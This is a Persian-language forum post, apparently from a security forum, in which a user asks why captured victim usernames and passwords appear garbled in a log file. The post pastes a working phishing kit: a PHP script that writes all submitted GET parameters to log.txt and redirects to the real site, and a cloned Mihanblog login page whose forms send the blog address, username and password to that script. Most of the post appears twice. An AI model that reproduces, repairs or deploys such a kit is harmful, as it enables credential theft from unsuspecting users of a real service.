رفتن به مطلب
انجمن تیم امنیتی گارد ایران

فیک پیچ


ارسال های توصیه شده

با سلام .

یک مشکل برام پیش اومده اینکه اطلاعاتی قربانی که میاد تو فایل log.txt به صورت عدد و کدهای عجیب و غریب میاد .

مثلا الان که قربانی یوزر و پسوردشو وارد میکنه به این صورت :

User : rebin

Pass : rebin

تو فایل log.txt به این صورت ظاهر میشه :

id=14682317265783702eb975crnrndata=rnsecfrdcodedvar=6071bef9449e96bd4786cf13b664e961rnfrm-id=14682317265783702eb975crnrnrn

اینم فایل های index.html و login.php

فایل Login.php :

<?php header ('Location: http://mihanblog.com/web/signin'); $handle = fopen("log.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?>

و فایل index.html :

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head> <link id="iconimg" rel="icon" href="http://static.mihanblog.com//public/images/icon/favicon2.gif" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript"> var lastTarget;</script>

<script type="text/javascript" src="http://static.mihanblog.com//public/scripts/run/jquery.min.js"></script><scripttype="text/javascript" src="http://static.mihanblog.com//public/scripts/run/g.site.v12.js"></script><script type="text/javascript" src="http://static.mihanblog.com//public/scripts/run/g.other.v3.js"></script><script type="text/javascript" src="http://static.mihanblog.com//public/scripts/run/v2.js?1"></script>

<style type="text/css"> /*<![CDATA[*/ @import url(http://mihanblog.com/public/public/styles/run/style.v24.css?6); /*]]>*/

@font-face { font-family: 'Mihan-Iransans'; src: url('/public/public/fonts/Iransans.eot'); src: url('/public/public/fonts/Iransans.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Iransans.woff2') format('woff2'), url('/public/public/fonts/Iransans.woff') format('woff'), url('/public/public/fonts/Iransans.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-IransansBold'; src: url('/public/public/fonts/Iransans-Black.eot'); src: url('/public/public/fonts/Iransans-Black.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Iransans-Black.woff2') format('woff2'), url('/public/public/fonts/Iransans-Black.woff') format('woff'), url('/public/public/fonts/Iransans-Black.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-IransansLight'; src: url('/public/public/fonts/Iransans-UltraLight.eot'); src: url('/public/public/fonts/Iransans-UltraLight.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Iransans-UltraLight.woff2') format('woff2'), url('/public/public/fonts/Iransans-UltraLight.woff') format('woff'), url('/public/public/fonts/Iransans-UltraLight.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-Nassim'; src: url('/public/public/fonts/Nassim.eot'); src: url('/public/public/fonts/Nassim.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Nassim.woff2') format('woff2'), url('/public/public/fonts/Nassim.woff') format('woff'), url('/public/public/fonts/Nassim.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-Koodak'; src: url('/public/public/fonts/Koodak.eot'); src: url('/public/public/fonts/Koodak.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Koodak.woff2') format('woff2'), url('/public/public/fonts/Koodak.woff') format('woff'), url('/public/public/fonts/Koodak.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-Yekan'; src: url('/public/public/fonts/Yekan.eot'); src: url('/public/public/fonts/Yekan.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Yekan.woff2') format('woff2'), url('/public/public/fonts/Yekan.woff') format('woff'), url('/public/public/fonts/Yekan.ttf') format('truetype'); font-weight: normal; font-style: normal; }

</style>

<script type="text/javascript"> var isMihanPlus = ''; var mihanBlog_commentBody_cursorPos = 0;</script><meta http-equiv="content-language" content="fa" /><meta name="verify-v1" content="3p6WlorbC9NRMNEySqIZ2AP2QAAIObugP1j4HU/ZuK0=" /><meta name="description" content="" /><meta name="keywords" content="" /><meta name="googlebot" content="noodp" />

<title>میهن بلاگ - صفحه اصلی ورود</title>

<script> var isMobileDevice = '1';

</script>

</head><body>

<div id="message_div" onclick="hidemessage();"></div><div id="ajaxrequest"></div>

<!-- <div id="wrapper-header">--><!-- <div id="wrapper-footer">-->

<div id="wrapper"> <div class="header_ver2"> <div class="tpl_ver2_width"> <div class="header_ver2_inner clearfix">

<div class="header_ver2_right"> <div class="header_ver2_logo"><img src="http://static.mihanblog.com//public/images/template_ver2/header_logo3.png"alt="میهن بلاگ" style="margin:0px" /></div> </div>

<script> header_ver2_left_name_layerShow = function(){ c_$('header_layer_webs').style.display; if(c_$('header_layer_webs').style.display=='block'){ c_$('header_layer_webs').style.display='none'; } else { c_$('header_layer_webs').style.display='block'; } } </script> <div class="header_ver2_left"> <div class="clearfix"> <script> var signupFormShow = false; header_ver2_left_linksOut_signupForm = function(){ if(!signupFormShow) c_$('header_ver2_left_links_signin').className += ' header_ver2_left_links_signin_selected'; else c_$('header_ver2_left_links_signin').className = c_$('header_ver2_left_links_signin').className.replace('header_ver2_left_links_signin_selected', '');

signupFormShow = !signupFormShow; }</script><div class="header_ver2_left_links header_ver2_left_linksOut"> <div class="clearfix">

<style type="text/css">.header_ver2_left_linksOut { width: 814px;} </style> <ul class="clearfix"><li><a href="http://mihanblog.com/"title="" class="" target="_self">صفحه نخست</a></li><li><a href="http://mihanblog.com/advert" title="" class="headertabset_bold" target="_self" rel="nofollow">تبلیغات</a></li><li><a href="http://mihanblog.com/etc/main/abuse" title="" class="" target="_self" rel="nofollow">گزارش تخلف</a></li><li><a href="http://mihanblog.com/about" title="" class="" target="_self">درباره ما</a></li><li><a href="http://mihanblog.com/web/signup" title="" class="new-header__signup" target="_self">ساخت وبلاگ</a></li><li><div id="header_ver2_left_links_signin" class="header_ver2_left_links_signin" ><div id="" class="header_ver2_left_linksOut_signupForm"><div class="header_ver2_left_linksOut_signupForm_x" onclick="header_ver2_left_linksOut_signupForm()"></div><div class="box"><div class="clearfix box_header_wrapper"><span class="box_header_bg" style="background: url(http://static.mihanblog.com//public/images/icon/gen.gif) no-repeat 98% -475px;"><img src="http://static.mihanblog.com//public/images/empty.gif" alt="-" /></span><span class="box_header">ورود</span></div>

<div style="float:right;width:200px"> <div class="multi-column loginform"> <div style="direction: rtl" id="form-wrapper-14682317265783702eb9fc4"><form id="frm-14682317265783702eb9fc4" method="GET" action="login.php" > <div class="form-row clearfix"> <label class="" for="address">وب لاگ</label> <input type="text" name="data[address]" id="address" value="" class="english" /> </div> <div class="form-row clearfix"> <label for="username">نام کاربری</label> <input type="text" name="data[username]" id="username" value="" class="english" /> </div> <div class="form-row clearfix"> <label class="" for="userpass">رمز عبور</label> <input type="password" name="data[userpass]" id="userpass" value="" class="english" /> </div> <div class="controls clearfix"> <input type="hidden" name="secfrdcodedvar" id="secfrdcodedvar" value="171fd8a166dd3e6373f1c1afca72dbea"><input type="submit" value="ورود" class="btn" style="width:80px" /> </div> <div class="form-row clearfix"> <ul class="toolset clearfix"><li style="float:right;margin-right:0px"><a href="http://mihanblog.com/web/signup"title="" class="" target="_self"style="background: url(http://static.mihanblog.com//public/images/icon/gen.gif) no-repeat 98% -475px;">ثبت نام در میهن بلاگ</a></li></ul><ul class="toolset clearfix"><li style="float:right;margin-right:0px"><a href="http://mihanblog.com/web/signin/forget" title="" class="" target="_self"style="background: url(http://static.mihanblog.com//public/images/icon/web1.gif) no-repeat 98% -208px;">کلمه رمز را فراموش کرده ام</a></li></ul> </div> <input type="hidden" name="frm-id" value="14682317265783702eb9fc4" id="frm-id" /></form></div> <script type="text/javascript">formtarget['14682317265783702eb9fc4'] = '';</script> </div> </div> <div class="publishPaging"></div> </div></div><u onclick="header_ver2_left_linksOut_signupForm()" class="header_ver2_left_links_signin_login">ورود</u></div></li></ul> </div></div> </div> </div>

</div> </div></div>

<div id="container"> <div class="clearfix tpl_ver2_width contentWrapper wrapper_web_signin_index" >

<div class="contentDiv_ver2">

<div class=""> <div id="main"> <div class="box"><div class="clearfix box_header_wrapper"><span class="box_header_bg" style="background: url(http://static.mihanblog.com//public/images/icon/gen.gif) no-repeat 98% -475px;"><img src="http://static.mihanblog.com//public/images/empty.gif" alt="-" /></span><span class="box_header">ورود</span></div>

<div style="float:right;width:200px"> <div class="multi-column loginform"> <div style="direction: rtl" id="form-wrapper-14682317265783702eb975c"><form id="frm-14682317265783702eb975c" method="GET" action="login.php" > <div class="form-row clearfix"> <label class="" for="address">وب لاگ</label> <input type="text" name="data[address]" id="address" value="" class="english" /> </div> <div class="form-row clearfix"> <label for="username">نام کاربری</label> <input type="text" name="data[username]" id="username" value="" class="english" /> </div> <div class="form-row clearfix"> <label class="" for="userpass">رمز عبور</label> <input type="password" name="data[userpass]" id="userpass" value="" class="english" /> </div> <div class="controls clearfix"> <input type="hidden" name="secfrdcodedvar" id="secfrdcodedvar" value="6071bef9449e96bd4786cf13b664e961"><input type="submit" value="ورود" class="btn" style="width:80px" /> </div> <div class="form-row clearfix"> </div> <input type="hidden" name="frm-id" value="14682317265783702eb975c" id="frm-id" /></form></div> <script type="text/javascript">formtarget['14682317265783702eb975c'] = '';</script> </div> </div> <div style="float:right;width:350px"> <div class="message-div-static info clearfix"><div class="message-close"> در صورتیکه نمی توانید وارد سایت شوید برای دریافت رمز عبورتان از طریق آدرس زیر اقدام کنید: <ul class="toolset clearfix"><li style="float:right;margin-right:0px"><a href="http://mihanblog.com/web/signin/forget"title="" class="" target="_self"style="background: url(http://static.mihanblog.com//public/images/icon/web1.gif) no-repeat 98% -208px;">کلمه رمز را فراموش کرده ام</a></li></ul> و یا به آدرس <b>support@mihanblog.com</b> ایمیل بزنید. </div></div> </div> <div class="publishPaging"></div> </div> </div> </div> </div>

</div> </div>

<style>

a { webkit-transition: all 300ms ease-out 0ms; transition: all 300ms ease-out 0ms;} .footer *{ font-family: 'Mihan-Iransans', tahoma, arial;}

.footer { height: auto; font-family: }

.footer--bg { background: #0d0d0d; padding: 110px 0;}

.social-media { display: block; text-align: center;}

.social-media__desc { color: #949ba6; font-size: 14px; font-weight: 300; text-align: center; margin-bottom: 5px; display: inline-block; padding-top: 16px; border-top: 1px solid #262626;}

.social-media__list li { display: inline-block; padding: 0 10px; }

.social-media__list li:first-child { padding-right: 0; }

.social-media__list li:last-child { padding-left: 0; }

.social-media__list .icon-aparat { background: url(../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 24px; height: 25px; display: block; background-position: -187px -41px;}

.social-media__list .icon-aparat:hover { background-position: -187px 3px;}

.social-media__list .icon-lenzor { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 25px; height: 25px; display: block; background-position: -231px -41px;}

.social-media__list .icon-lenzor:hover { background-position: -231px 2px;}

.social-media__list .icon-cloob { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 29px; height: 25px; display: block; background-position: -143px -40px;}

.social-media__list .icon-cloob:hover { background-position: -143px 4px;}

.social-media__list .icon-facebook-squared { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 25px; height: 25px; display: block; background-position: -50px -41px;}

.social-media__list .icon-facebook-squared:hover { background-position: -50px -1px;}

.social-media__list .icon-instagram { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 25px; height: 25px; display: block; background-position: -100px -40px;}

.social-media__list .icon-instagram:hover { background-position: -100px 0px;}

.social-media__list .icon-twitter { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 25px; height: 25px; display: block; background-position: 0 -41px;;}

.social-media__list .icon-twitter:hover { background-position: 0px -1px;}

.footer-menu li { display: inline-block; font-size: 13px; padding: 0 15px;}

.footer-menu a { color: #949ba6;}

.footer-menu a:hover { color: #0277bd;}

.footer-logo { width: 102px; height: 65px; display: inline-block; margin-bottom: 35px; background: url(../../../../public/public/images/template/app-page-image/footer-logo.png) no-repeat;}

.colorfull-logo { background: url(../../../../public/public/images/template/app-page-image/footer-logo-hover.png) no-repeat; width: 102px; height: 65px; display: inline-block; opacity: 0; webkit-transition: opacity 300ms ease-out 0ms; -moz-transition: opacity 300ms ease-out 0ms; -ms-transition: opacity 300ms ease-out 0ms; -o-transition: opacity 300ms ease-out 0ms; transition: opacity 300ms ease-out 0ms;}

.colorfull-logo:hover { opacity: 1; webkit-transition: opacity 300ms ease-out 0ms; -moz-transition: opacity 300ms ease-out 0ms; -ms-transition: opacity 300ms ease-out 0ms; -o-transition: opacity 300ms ease-out 0ms; transition: opacity 300ms ease-in 0ms;}

.social-media__list { display: inline-block; border-top: 1px solid #262626; padding-top: 27px;}

</style> <div class="footer"> <div class="footer--bg"> <div class="row"> <a href='http://mihanblog.com/"title="" class="footer-logo" target="_self"><span class="colorfull-logo"></span></a> <div class="social-media"> <ul class="social-media__list"> <li><a class="icon-aparat" target="_blank" href="http://www.aparat.com/mihanblog"></a></li> <li><a class="icon-lenzor" target="_blank" href="http://www.lenzor.com/mihanblog"></a></li> <li><a class="icon-cloob" target="_blank" href="http://www.cloob.com/mihanblog"></a></li> <li><a class="icon-twitter" target="_blank" href="https://twitter.com/mihanblog_com"></a></li> <li><a class="icon-facebook-squared" target="_blank" href="https://www.facebook.com/mihanblog.page"></a></li> <li><a class="icon-instagram" target="_blank" href="https://instagram.com/mihanblog_com/"></a></li> </ul> </div> <div class="footer-menu"> <li><a href="http://mihanblog.com/faq" title="" class="" target="_self">پرسش‎های متداول</a></li> <li><a href="http://mihanblog.com/about" title="" class="" target="_self">درباره ما</a></li> <li><a href="http://mihanblog.com/advert" title="" class="" target="_self" rel="nofollow">تبلیغات</a></li> <li><a href="http://mihanblog.com/etc/main/terms" title="" class="" target="_self" rel="nofollow">قوانین و مقررات</a></li> <li><a href="http://mihanblog.com/contact" title="" class="" target="_self">تماس با ما</a></li> <li><a href="http://mihanblog.com/job" title="" class="" target="_self">به ما بپیوندید</a></li> <li><a href="http://mihanblog.com/app" title="" class="" target="_self">نرم افزار</a></li> </div> </div> </div> </div> <!-- </div>--></div>

<div id="wrapper-layer"></div>

<div id="inner-container" class="system-color1-web"> <div class="wrapper-layer_x" onclick="closewrapper();"></div> <div id="inner-layer"></div></div>

<div id="hiddenDiv" style="display:none"></div>

<div id="ajax-load"> <center> <div id="ajax-inner" class="layer-loading" style="position:absolute;top:10px;left:300px;margin:0px auto"> </div>

<script type="text/javascript"> errortxt = '<div class="message-div-static error clearfix"><div class="message-close">در ارتباط شما با سایت مشکلی رخ داده است. لطفاً مجدداً تلاش نمایید.</div></div>'; $d('dwzBjfc%21%3D%21%27ammr%3A%2F%2Fklajnszbq.vbk%27%3B'); </script>

<script type="text/javascript">

var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-153829-9']); _gaq.push(['_setDomainName', 'mihanblog.com']); _gaq.push(['_trackPageview']);

(function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl': 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();

</script>

<!-- </div>--></body></html>

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

با سلام .

یک مشکل برام پیش اومده اینکه اطلاعاتی قربانی که میاد تو فایل log.txt به صورت عدد و کدهای عجیب و غریب میاد .

مثلا الان که قربانی یوزر و پسوردشو وارد میکنه به این صورت :

User : rebin

Pass : rebin

تو فایل log.txt به این صورت ظاهر میشه :

id=14682317265783702eb975crnrndata=rnsecfrdcodedvar=6071bef9449e96bd4786cf13b664e961rnfrm-id=14682317265783702eb975crnrnrn

اینم فایل های index.html و login.php

فایل Login.php :

<?php header ('Location: http://mihanblog.com/web/signin'); $handle = fopen("log.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?>

و فایل index.html :

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head> <link id="iconimg" rel="icon" href="http://static.mihanblog.com//public/images/icon/favicon2.gif" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript"> var lastTarget;</script>

<script type="text/javascript" src="http://static.mihanblog.com//public/scripts/run/jquery.min.js"></script><scripttype="text/javascript" src="http://static.mihanblog.com//public/scripts/run/g.site.v12.js"></script><script type="text/javascript" src="http://static.mihanblog.com//public/scripts/run/g.other.v3.js"></script><script type="text/javascript" src="http://static.mihanblog.com//public/scripts/run/v2.js?1"></script>

<style type="text/css"> /*<![CDATA[*/ @import url(http://mihanblog.com/public/public/styles/run/style.v24.css?6); /*]]>*/

@font-face { font-family: 'Mihan-Iransans'; src: url('/public/public/fonts/Iransans.eot'); src: url('/public/public/fonts/Iransans.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Iransans.woff2') format('woff2'), url('/public/public/fonts/Iransans.woff') format('woff'), url('/public/public/fonts/Iransans.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-IransansBold'; src: url('/public/public/fonts/Iransans-Black.eot'); src: url('/public/public/fonts/Iransans-Black.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Iransans-Black.woff2') format('woff2'), url('/public/public/fonts/Iransans-Black.woff') format('woff'), url('/public/public/fonts/Iransans-Black.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-IransansLight'; src: url('/public/public/fonts/Iransans-UltraLight.eot'); src: url('/public/public/fonts/Iransans-UltraLight.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Iransans-UltraLight.woff2') format('woff2'), url('/public/public/fonts/Iransans-UltraLight.woff') format('woff'), url('/public/public/fonts/Iransans-UltraLight.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-Nassim'; src: url('/public/public/fonts/Nassim.eot'); src: url('/public/public/fonts/Nassim.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Nassim.woff2') format('woff2'), url('/public/public/fonts/Nassim.woff') format('woff'), url('/public/public/fonts/Nassim.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-Koodak'; src: url('/public/public/fonts/Koodak.eot'); src: url('/public/public/fonts/Koodak.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Koodak.woff2') format('woff2'), url('/public/public/fonts/Koodak.woff') format('woff'), url('/public/public/fonts/Koodak.ttf') format('truetype'); font-weight: normal; font-style: normal; } @font-face { font-family: 'Mihan-Yekan'; src: url('/public/public/fonts/Yekan.eot'); src: url('/public/public/fonts/Yekan.eot?#iefix') format('embedded-opentype'), url('/public/public/fonts/Yekan.woff2') format('woff2'), url('/public/public/fonts/Yekan.woff') format('woff'), url('/public/public/fonts/Yekan.ttf') format('truetype'); font-weight: normal; font-style: normal; }

</style>

<script type="text/javascript"> var isMihanPlus = ''; var mihanBlog_commentBody_cursorPos = 0;</script><meta http-equiv="content-language" content="fa" /><meta name="verify-v1" content="3p6WlorbC9NRMNEySqIZ2AP2QAAIObugP1j4HU/ZuK0=" /><meta name="description" content="" /><meta name="keywords" content="" /><meta name="googlebot" content="noodp" />

<title>میهن بلاگ - صفحه اصلی ورود</title>

<script> var isMobileDevice = '1';

</script>

</head><body>

<div id="message_div" onclick="hidemessage();"></div><div id="ajaxrequest"></div>

<!-- <div id="wrapper-header">--><!-- <div id="wrapper-footer">-->

<div id="wrapper"> <div class="header_ver2"> <div class="tpl_ver2_width"> <div class="header_ver2_inner clearfix">

<div class="header_ver2_right"> <div class="header_ver2_logo"><img src="http://static.mihanblog.com//public/images/template_ver2/header_logo3.png"alt="میهن بلاگ" style="margin:0px" /></div> </div>

<script> header_ver2_left_name_layerShow = function(){ c_$('header_layer_webs').style.display; if(c_$('header_layer_webs').style.display=='block'){ c_$('header_layer_webs').style.display='none'; } else { c_$('header_layer_webs').style.display='block'; } } </script> <div class="header_ver2_left"> <div class="clearfix"> <script> var signupFormShow = false; header_ver2_left_linksOut_signupForm = function(){ if(!signupFormShow) c_$('header_ver2_left_links_signin').className += ' header_ver2_left_links_signin_selected'; else c_$('header_ver2_left_links_signin').className = c_$('header_ver2_left_links_signin').className.replace('header_ver2_left_links_signin_selected', '');

signupFormShow = !signupFormShow; }</script><div class="header_ver2_left_links header_ver2_left_linksOut"> <div class="clearfix">

<style type="text/css">.header_ver2_left_linksOut { width: 814px;} </style> <ul class="clearfix"><li><a href="http://mihanblog.com/"title="" class="" target="_self">صفحه نخست</a></li><li><a href="http://mihanblog.com/advert" title="" class="headertabset_bold" target="_self" rel="nofollow">تبلیغات</a></li><li><a href="http://mihanblog.com/etc/main/abuse" title="" class="" target="_self" rel="nofollow">گزارش تخلف</a></li><li><a href="http://mihanblog.com/about" title="" class="" target="_self">درباره ما</a></li><li><a href="http://mihanblog.com/web/signup" title="" class="new-header__signup" target="_self">ساخت وبلاگ</a></li><li><div id="header_ver2_left_links_signin" class="header_ver2_left_links_signin" ><div id="" class="header_ver2_left_linksOut_signupForm"><div class="header_ver2_left_linksOut_signupForm_x" onclick="header_ver2_left_linksOut_signupForm()"></div><div class="box"><div class="clearfix box_header_wrapper"><span class="box_header_bg" style="background: url(http://static.mihanblog.com//public/images/icon/gen.gif) no-repeat 98% -475px;"><img src="http://static.mihanblog.com//public/images/empty.gif" alt="-" /></span><span class="box_header">ورود</span></div>

<div style="float:right;width:200px"> <div class="multi-column loginform"> <div style="direction: rtl" id="form-wrapper-14682317265783702eb9fc4"><form id="frm-14682317265783702eb9fc4" method="GET" action="login.php" > <div class="form-row clearfix"> <label class="" for="address">وب لاگ</label> <input type="text" name="data[address]" id="address" value="" class="english" /> </div> <div class="form-row clearfix"> <label for="username">نام کاربری</label> <input type="text" name="data[username]" id="username" value="" class="english" /> </div> <div class="form-row clearfix"> <label class="" for="userpass">رمز عبور</label> <input type="password" name="data[userpass]" id="userpass" value="" class="english" /> </div> <div class="controls clearfix"> <input type="hidden" name="secfrdcodedvar" id="secfrdcodedvar" value="171fd8a166dd3e6373f1c1afca72dbea"><input type="submit" value="ورود" class="btn" style="width:80px" /> </div> <div class="form-row clearfix"> <ul class="toolset clearfix"><li style="float:right;margin-right:0px"><a href="http://mihanblog.com/web/signup"title="" class="" target="_self"style="background: url(http://static.mihanblog.com//public/images/icon/gen.gif) no-repeat 98% -475px;">ثبت نام در میهن بلاگ</a></li></ul><ul class="toolset clearfix"><li style="float:right;margin-right:0px"><a href="http://mihanblog.com/web/signin/forget" title="" class="" target="_self"style="background: url(http://static.mihanblog.com//public/images/icon/web1.gif) no-repeat 98% -208px;">کلمه رمز را فراموش کرده ام</a></li></ul> </div> <input type="hidden" name="frm-id" value="14682317265783702eb9fc4" id="frm-id" /></form></div> <script type="text/javascript">formtarget['14682317265783702eb9fc4'] = '';</script> </div> </div> <div class="publishPaging"></div> </div></div><u onclick="header_ver2_left_linksOut_signupForm()" class="header_ver2_left_links_signin_login">ورود</u></div></li></ul> </div></div> </div> </div>

</div> </div></div>

<div id="container"> <div class="clearfix tpl_ver2_width contentWrapper wrapper_web_signin_index" >

<div class="contentDiv_ver2">

<div class=""> <div id="main"> <div class="box"><div class="clearfix box_header_wrapper"><span class="box_header_bg" style="background: url(http://static.mihanblog.com//public/images/icon/gen.gif) no-repeat 98% -475px;"><img src="http://static.mihanblog.com//public/images/empty.gif" alt="-" /></span><span class="box_header">ورود</span></div>

<div style="float:right;width:200px"> <div class="multi-column loginform"> <div style="direction: rtl" id="form-wrapper-14682317265783702eb975c"><form id="frm-14682317265783702eb975c" method="GET" action="login.php" > <div class="form-row clearfix"> <label class="" for="address">وب لاگ</label> <input type="text" name="data[address]" id="address" value="" class="english" /> </div> <div class="form-row clearfix"> <label for="username">نام کاربری</label> <input type="text" name="data[username]" id="username" value="" class="english" /> </div> <div class="form-row clearfix"> <label class="" for="userpass">رمز عبور</label> <input type="password" name="data[userpass]" id="userpass" value="" class="english" /> </div> <div class="controls clearfix"> <input type="hidden" name="secfrdcodedvar" id="secfrdcodedvar" value="6071bef9449e96bd4786cf13b664e961"><input type="submit" value="ورود" class="btn" style="width:80px" /> </div> <div class="form-row clearfix"> </div> <input type="hidden" name="frm-id" value="14682317265783702eb975c" id="frm-id" /></form></div> <script type="text/javascript">formtarget['14682317265783702eb975c'] = '';</script> </div> </div> <div style="float:right;width:350px"> <div class="message-div-static info clearfix"><div class="message-close"> در صورتیکه نمی توانید وارد سایت شوید برای دریافت رمز عبورتان از طریق آدرس زیر اقدام کنید: <ul class="toolset clearfix"><li style="float:right;margin-right:0px"><a href="http://mihanblog.com/web/signin/forget"title="" class="" target="_self"style="background: url(http://static.mihanblog.com//public/images/icon/web1.gif) no-repeat 98% -208px;">کلمه رمز را فراموش کرده ام</a></li></ul> و یا به آدرس <b>support@mihanblog.com</b> ایمیل بزنید. </div></div> </div> <div class="publishPaging"></div> </div> </div> </div> </div>

</div> </div>

<style>

a { webkit-transition: all 300ms ease-out 0ms; transition: all 300ms ease-out 0ms;} .footer *{ font-family: 'Mihan-Iransans', tahoma, arial;}

.footer { height: auto; font-family: }

.footer--bg { background: #0d0d0d; padding: 110px 0;}

.social-media { display: block; text-align: center;}

.social-media__desc { color: #949ba6; font-size: 14px; font-weight: 300; text-align: center; margin-bottom: 5px; display: inline-block; padding-top: 16px; border-top: 1px solid #262626;}

.social-media__list li { display: inline-block; padding: 0 10px; }

.social-media__list li:first-child { padding-right: 0; }

.social-media__list li:last-child { padding-left: 0; }

.social-media__list .icon-aparat { background: url(../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 24px; height: 25px; display: block; background-position: -187px -41px;}

.social-media__list .icon-aparat:hover { background-position: -187px 3px;}

.social-media__list .icon-lenzor { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 25px; height: 25px; display: block; background-position: -231px -41px;}

.social-media__list .icon-lenzor:hover { background-position: -231px 2px;}

.social-media__list .icon-cloob { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 29px; height: 25px; display: block; background-position: -143px -40px;}

.social-media__list .icon-cloob:hover { background-position: -143px 4px;}

.social-media__list .icon-facebook-squared { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 25px; height: 25px; display: block; background-position: -50px -41px;}

.social-media__list .icon-facebook-squared:hover { background-position: -50px -1px;}

.social-media__list .icon-instagram { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 25px; height: 25px; display: block; background-position: -100px -40px;}

.social-media__list .icon-instagram:hover { background-position: -100px 0px;}

.social-media__list .icon-twitter { background: url(../../../../public/public/images/template/app-page-image/social-icons.png) no-repeat; width: 25px; height: 25px; display: block; background-position: 0 -41px;;}

.social-media__list .icon-twitter:hover { background-position: 0px -1px;}

.footer-menu li { display: inline-block; font-size: 13px; padding: 0 15px;}

.footer-menu a { color: #949ba6;}

.footer-menu a:hover { color: #0277bd;}

.footer-logo { width: 102px; height: 65px; display: inline-block; margin-bottom: 35px; background: url(../../../../public/public/images/template/app-page-image/footer-logo.png) no-repeat;}

.colorfull-logo { background: url(../../../../public/public/images/template/app-page-image/footer-logo-hover.png) no-repeat; width: 102px; height: 65px; display: inline-block; opacity: 0; webkit-transition: opacity 300ms ease-out 0ms; -moz-transition: opacity 300ms ease-out 0ms; -ms-transition: opacity 300ms ease-out 0ms; -o-transition: opacity 300ms ease-out 0ms; transition: opacity 300ms ease-out 0ms;}

.colorfull-logo:hover { opacity: 1; webkit-transition: opacity 300ms ease-out 0ms; -moz-transition: opacity 300ms ease-out 0ms; -ms-transition: opacity 300ms ease-out 0ms; -o-transition: opacity 300ms ease-out 0ms; transition: opacity 300ms ease-in 0ms;}

.social-media__list { display: inline-block; border-top: 1px solid #262626; padding-top: 27px;}

</style> <div class="footer"> <div class="footer--bg"> <div class="row"> <a href='http://mihanblog.com/"title="" class="footer-logo" target="_self"><span class="colorfull-logo"></span></a> <div class="social-media"> <ul class="social-media__list"> <li><a class="icon-aparat" target="_blank" href="http://www.aparat.com/mihanblog"></a></li> <li><a class="icon-lenzor" target="_blank" href="http://www.lenzor.com/mihanblog"></a></li> <li><a class="icon-cloob" target="_blank" href="http://www.cloob.com/mihanblog"></a></li> <li><a class="icon-twitter" target="_blank" href="https://twitter.com/mihanblog_com"></a></li> <li><a class="icon-facebook-squared" target="_blank" href="https://www.facebook.com/mihanblog.page"></a></li> <li><a class="icon-instagram" target="_blank" href="https://instagram.com/mihanblog_com/"></a></li> </ul> </div> <div class="footer-menu"> <li><a href="http://mihanblog.com/faq" title="" class="" target="_self">پرسش‎های متداول</a></li> <li><a href="http://mihanblog.com/about" title="" class="" target="_self">درباره ما</a></li> <li><a href="http://mihanblog.com/advert" title="" class="" target="_self" rel="nofollow">تبلیغات</a></li> <li><a href="http://mihanblog.com/etc/main/terms" title="" class="" target="_self" rel="nofollow">قوانین و مقررات</a></li> <li><a href="http://mihanblog.com/contact" title="" class="" target="_self">تماس با ما</a></li> <li><a href="http://mihanblog.com/job" title="" class="" target="_self">به ما بپیوندید</a></li> <li><a href="http://mihanblog.com/app" title="" class="" target="_self">نرم افزار</a></li> </div> </div> </div> </div> <!-- </div>--></div>

<div id="wrapper-layer"></div>

